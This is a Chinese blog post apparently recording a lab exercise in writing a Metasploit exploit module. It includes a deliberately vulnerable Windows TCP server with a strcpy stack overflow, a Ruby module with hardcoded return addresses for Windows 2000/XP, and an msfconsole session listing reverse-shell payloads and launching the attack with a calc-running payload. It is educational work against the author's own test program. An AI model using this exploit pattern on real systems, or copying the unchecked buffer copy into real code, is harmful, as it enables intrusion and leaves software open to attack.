devbox
繁依Fanyi0
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

4.2 metasploit 开发 exploit_如何利用matesploit进行exploit代码编写

作者:繁依Fanyi0 | 2024-06-12 00:21:04

如何利用matesploit进行exploit代码编写

目录

一、实验清单

二、实验思路

三、实验步骤

一、实验清单

实验清单
类型序号软硬件要求规格
攻击机1数量1台
2操作系统版本kali
3软件版本metasploit
靶机1数量1台
2操作系统版本windows xp sp3
3软件版本vc++

二、实验思路

        靶机:采用一个存在典型栈溢出的server,其代码如下:

  1. #include<iostream.h>
  2. #include<winsock2.h>
  3. #pragma comment(lib,"ws2_32.lib") 
  4. void msg_display(char *buf)
  5. {
  6. 	char msg[200];
  7. 	strcpy(msg,buf);  //overflow here,copy 0x200 to200
  8. 	cout<<"***************"<<endl;
  9. 	cout<<"received:"<<endl;
  10. 	cout<<msg<<endl;
  11. }
  12.  
  13. void main()
  14. {
  15. 	int sock,msgsock,lenth,receive_len;
  16. 	struct sockaddr_in sock_server,sock_client;
  17. 	char buf[0x200];//notice it is 0x200
  18.  
  19. 	WSADATA wsa;
  20. 	WSAStartup(MAKEWORD(1,1),&wsa);
  21. 	if((sock=socket(AF_INET,SOCK_STREAM,0))<0)
  22. 	{
  23. 		cout<<sock<<"socket creating error!"<<endl;
  24. 		exit(1);
  25. 	}
  26. 	sock_server.sin_family=AF_INET;
  27. 	sock_server.sin_port=htons(7777);
  28. 	sock_server.sin_addr.s_addr=htonl(INADDR_ANY);
  29. 	if(bind(sock,(struct sockaddr*)&sock_server,sizeof(sock_server)))
  30. 	{
  31. 		cout<<"binging stream socket error!"<<endl;
  32. 	}
  33. 	cout<<"****************************"<<endl;
  34. 	cout<<"exploit target server 1.0 "<<endl;
  35. 	cout<<"****************************"<<endl;
  36. 	listen(sock,4);
  37. 	lenth=sizeof(struct sockaddr);
  38. 	do{
  39. 		msgsock=accept(sock,(struct sockaddr*)&sock_client,(int*)&lenth);
  40. 		if(msgsock==-1)
  41. 		{
  42. 			cout<<"accept error"<<endl;
  43. 			break;
  44. 		}
  45. 		else
  46. 			do
  47. 			{
  48. 				memset(buf,0,sizeof(buf));
  49. 				if((receive_len=recv(msgsock,buf,sizeof(buf),0))<0)
  50. 				{
  51. 					cout<<"reading stream message error!"<<endl;
  52. 					receive_len=0;
  53. 				}
  54. 				msg_display(buf);   //trigged the overflow
  55. 			}while(receive_len);
  56. 			closesocket(msgsock);
  57. 	}while(1);
  58. 	WSACleanup();
  59. }

        程序大致思路:在vc++中编译运行后,程序会在7777端口监听TCP连接,如果收到数据,就在屏幕上打印出来。在main函数中,buf数组的大小被声明为0x200,在mag_display函数中,将大小为0x200的字符串复制进200大小的局部数组,从而引发一个典型的栈溢出。

        攻击机:使用Ruby语言开发一个exploit模板,并在MSF上运行以测试漏洞。Ruby脚本如下:

  1. #!/usr/bin/env ruby
  2. require 'msf/core'
  3. class Metasploit3 < Msf::Exploit::Remote
  4. 	include Exploit::Remote::TCP
  5. 	def initialize(info = {})
  6. 		super(update_info(info,
  7. 		'Name' => 'failwest_test',
  8. 		'Platform' => 'win',
  9. 		'Target' => [
  10. 			['Windows 2000',{'Ret' => 0x77F8948B}],
  11. 			['WIndows XP SP3',{'Ret' => 0x77D928A3}]
  12. 			],
  13. 		'Payload' => {
  14. 			'Space' => 2000,
  15. 			'BadChars' => "\x00",
  16. 			}
  17. 		))
  18. 	end #end of initialize
  19. 	def exploit
  20. 		connect
  21. 		attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
  22. 		sock.put(attack_buf)
  23. 		handler
  24. 		disconnect
  25. 	end #end of exploit def
  26. end #end of class def

        对上述代码进行简单解释:

        (1)require指明所需的类库,相当于C语言的include;

        (2)运算符“<”表示继承,也就是,我们这里所定义的类是由Msf::Exploit::Remote继承而来;

        (3)在类中,定义了两个方法(函数),一个是initialize,另一个是exploit。现在模板的框架可以看成:

  1. class xxx
  2.     
  3.     def initialize
  4.     #定义模块初始化信息,如漏洞适用的操作系统平台、为不同操作系统指明不同的返回地址
  5.     #指明shellcode中禁止出现的特殊字符、漏洞相关描述、URL引用、作者信息等
  6.     end
  7.  
  8.     def exploit
  9.     #将填充物、返回地址、shellcode等组织成最终的attack_buf,并发送
  10.     end
  11.  
  12. end

        从实验所用的Ruby脚本看initialize:

  1. def initialize(info = {})
  2. 		super(update_info(info,
  3. 		'Name' => 'failwest_test',
  4. 		'Platform' => 'win',
  5. 		'Target' => [
  6. 			['Windows 2000',{'Ret' => 0x77F8948B}],
  7. 			['WIndows XP SP3',{'Ret' => 0x77D928A3}]
  8. 			],
  9. 		'Payload' => {
  10. 			'Space' => 2000,
  11. 			'BadChars' => "\x00",
  12. 			}
  13. 		))
  14. 	end #end of initialize

        (1)Name模块的名称,在msf console中,使用“show exploit”命令,会显示每一个exploit的序号、路径...以及此时这个Name;

        (2)Platform模块运行平台,MSF通过这个值来为exploit挑选payload。本例中,该值为‘win’,在挑选payload时,MSF只会选择windows平台的payload,而BSD、linux的payload将会被禁用。

        (3)Targets可以定义多种操作系统的返回地址。可以用ollydbg或者msf有个模块可以获取跳转指令的返回地址。

        (4)Payload则是对shellcode的要求,如大小和禁止用的字节等。

        再看exploit:

  1. def exploit
  2. 		connect
  3. 		attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
  4. 		sock.put(attack_buf)
  5. 		handler
  6. 		disconnect
  7. 	end #end of exploit def

        对于attack_buf:

attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded

         (1)用200个字符“a”填充缓冲区;

        (2)pack('V')的作用是把数据按照DWORD逆序

        (3)payload.excoded是将payload编码。

三、实验步骤

1、在靶机上编译并运行漏洞程序;

2、在攻击机上编写Ruby脚本,保存为“test_exploit.rb”,存放路径为:

/var/usr/share/metasploit-framework/modules/exploits/failwest/

3、启动msf console,并且输入以下命令;

  1. msf6 > use exploit/failwest/test_exploit
  2. [*] No payload configured, defaulting to generic/shell_reverse_tcp
  3. msf6 exploit(failwest/test_exploit) > show targets
  4.  
  5. Exploit targets:
  6.  
  7.    Id  Name
  8.    --  ----
  9.    0   Automatic
  10.    1   Windows 2000
  11.    2   WIndows XP SP2
  12.  
  13.  
  14. msf6 exploit(failwest/test_exploit) > set target 2
  15. target => 2
  16. msf6 exploit(failwest/test_exploit) > show payloads
  17.  
  18. Compatible Payloads
  19. ===================
  20.  
  21.    #   Name                                                 Disclosure Date  Rank    Check  Description
  22.    -   ----                                                 ---------------  ----    -----  -----------
  23.    0   payload/generic/custom                                                normal  No     Custom Payload
  24.    1   payload/generic/debug_trap                                            normal  No     Generic x86 Debug Trap
  25.    2   payload/generic/shell_bind_tcp                                        normal  No     Generic Command Shell, Bind TCP Inline
  26.    3   payload/generic/shell_reverse_tcp                                     normal  No     Generic Command Shell, Reverse TCP Inline
  27.    4   payload/generic/ssh/interact                                          normal  No     Interact with Established SSH Connection
  28.    5   payload/generic/tight_loop                                            normal  No     Generic x86 Tight Loop
  29.    6   payload/windows/dllinject/reverse_nonx_tcp                            normal  No     Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
  30.    7   payload/windows/dllinject/reverse_ord_tcp                             normal  No     Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
  31.    8   payload/windows/exec                                                  normal  No     Windows Execute Command
  32.    9   payload/windows/meterpreter/reverse_nonx_tcp                          normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
  33.    10  payload/windows/meterpreter/reverse_ord_tcp                           normal  No     Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
  34.    11  payload/windows/metsvc_bind_tcp                                       normal  No     Windows Meterpreter Service, Bind TCP
  35.    12  payload/windows/metsvc_reverse_tcp                                    normal  No     Windows Meterpreter Service, Reverse TCP Inline
  36.    13  payload/windows/patchupdllinject/reverse_nonx_tcp                     normal  No     Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
  37.    14  payload/windows/patchupdllinject/reverse_ord_tcp                      normal  No     Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
  38.    15  payload/windows/patchupmeterpreter/reverse_nonx_tcp                   normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
  39.    16  payload/windows/patchupmeterpreter/reverse_ord_tcp                    normal  No     Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
  40.    17  payload/windows/peinject/reverse_nonx_tcp                             normal  No     Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
  41.    18  payload/windows/peinject/reverse_ord_tcp                              normal  No     Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
  42.    19  payload/windows/powershell_bind_tcp                                   normal  No     Windows Interactive Powershell Session, Bind TCP
  43.    20  payload/windows/powershell_reverse_tcp                                normal  No     Windows Interactive Powershell Session, Reverse TCP
  44.    21  payload/windows/powershell_reverse_tcp_ssl                            normal  No     Windows Interactive Powershell Session, Reverse TCP SSL
  45.    22  payload/windows/shell/reverse_nonx_tcp                                normal  No     Windows Command Shell, Reverse TCP Stager (No NX or Win7)
  46.    23  payload/windows/shell/reverse_ord_tcp                                 normal  No     Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
  47.    24  payload/windows/upexec/reverse_nonx_tcp                               normal  No     Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
  48.    25  payload/windows/upexec/reverse_ord_tcp                                normal  No     Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
  49.    26  payload/windows/vncinject/reverse_nonx_tcp                            normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
  50.    27  payload/windows/vncinject/reverse_ord_tcp                             normal  No     VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
  51.  
  52. msf6 exploit(failwest/test_exploit) > set payload windows/exec
  53. payload => windows/exec
  54. msf6 exploit(failwest/test_exploit) > show options
  55.  
  56. Module options (exploit/failwest/test_exploit):
  57.  
  58.    Name    Current Setting  Required  Description
  59.    ----    ---------------  --------  -----------
  60.    RHOSTS                   yes       The target host(s), see https://github.com/ra
  61.                                       pid7/metasploit-framework/wiki/Using-Metasplo
  62.                                       it
  63.    RPORT                    yes       The target port (TCP)
  64.  
  65.  
  66. Payload options (windows/exec):
  67.  
  68.    Name      Current Setting  Required  Description
  69.    ----      ---------------  --------  -----------
  70.    CMD                        yes       The command string to execute
  71.    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread,
  72.                                         process, none)
  73.  
  74.  
  75. Exploit target:
  76.  
  77.    Id  Name
  78.    --  ----
  79.    2   WIndows XP SP2
  80.  
  81.  
  82. msf6 exploit(failwest/test_exploit) > set rhost 192.168.92.132  //靶机IP
  83. rhost => 192.168.92.132
  84. msf6 exploit(failwest/test_exploit) > set rport 7777
  85. rport => 7777
  86. msf6 exploit(failwest/test_exploit) > set cmd calc
  87. cmd => calc
  88. msf6 exploit(failwest/test_exploit) > set exitfunc seh
  89. exitfunc => seh
  90. msf6 exploit(failwest/test_exploit) > exploit

4、回到靶机,可以看到如下界面:

        唯一的不足就是:shellcode已经注入到靶机中了,但是没有运行。

        为此,做了以下努力:

        (1)使用telnet命令,连接到了靶机,并且也正常输出字符,说明漏洞程序没有问题;

         (2)在msf中,使用generate命令,将payload为windows/exec的shellcode找出来,并且用加载程序在靶机上运行,结果是可以调出计算器,正常运行。

        至此,具体为什么使用exploit注入的shellcode无法运行的原因不知,有待进一步研究。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/705304
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号